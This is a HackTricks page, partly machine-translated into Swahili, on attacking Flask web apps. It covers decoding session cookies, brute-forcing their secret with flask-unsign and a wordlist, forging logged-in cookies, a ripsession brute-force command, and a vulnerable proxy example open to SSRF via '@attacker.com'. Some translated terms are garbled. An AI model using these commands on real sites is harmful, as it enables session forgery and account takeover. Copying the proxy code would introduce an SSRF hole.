Flask

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Automate OffSec, EASM, and Custom Security Processes | Trickest

Labda ikiwa unacheza CTF, programu ya Flask itahusiana na SSTI.

Cookies

Jina la kikao cha kuki la default ni session.

Decoder

Decoder ya kuki za Flask mtandaoni: https://www.kirsle.net/wizards/flask-session.cgi

Manual

Pata sehemu ya kwanza ya kuki hadi nukta ya kwanza na uifanye Base64 decode>

echo "ImhlbGxvIg" | base64 -d

Keki pia imesainiwa kwa kutumia nenosiri

Flask-Unsign

Zana ya mstari wa amri ya kupata, kufungua, kujaribu nguvu, na kuunda keki za kikao za programu ya Flask kwa kubashiri funguo za siri.

flask-unsignPyPI

pip3 install flask-unsign

Fasiri Keki

flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'

Nguvu Mbili

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval

Kusaini

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'

Kusaini kwa kutumia toleo la zamani (legacy)

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy

RIPsession

Zana ya mistari ya amri ya kulazimisha tovuti kwa kutumia vidakuzi vilivyoundwa na flask-unsign.

GitHub - Tagvi/ripsession: A command line tool to brute-force websites using cookies crafted with flask-unsign.GitHub

ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt

Mfano huu unatumia chaguo la sqlmap eval ili kusaini kiotomatiki payloads za sqlmap kwa flask kwa kutumia siri inayojulikana.

Flask Proxy kwa SSRF

Katika andiko hili inaelezwa jinsi Flask inavyoruhusu ombi lianze na herufi "@":

GET @/ HTTP/1.1
Host: target.com
Connection: close

Katika hali ifuatayo:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)

Could allow to introduce something like "@attacker.com" in order to cause a SSRF.

Tumia Trickest kujenga na kujiendesha kazi kwa urahisi zenye nguvu za zana za jamii za kisasa zaidi duniani. Pata Ufikiaji Leo:

Automate OffSec, EASM, and Custom Security Processes | Trickest

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousElectron contextIsolation RCE via IPC NextNextJS

Last updated 4 days ago

Cookies

Decoder

Manual

Flask-Unsign

Fasiri Keki

Nguvu Mbili

Kusaini

Kusaini kwa kutumia toleo la zamani (legacy)

RIPsession

SQLi katika Flask session cookie na SQLmap

Flask Proxy kwa SSRF

Cookies

Decoder

Manual

Flask-Unsign

Fasiri Keki

Nguvu Mbili

Kusaini

Kusaini kwa kutumia toleo la zamani (legacy)

RIPsession

SQLi katika Flask session cookie na SQLmap

Flask Proxy kwa SSRF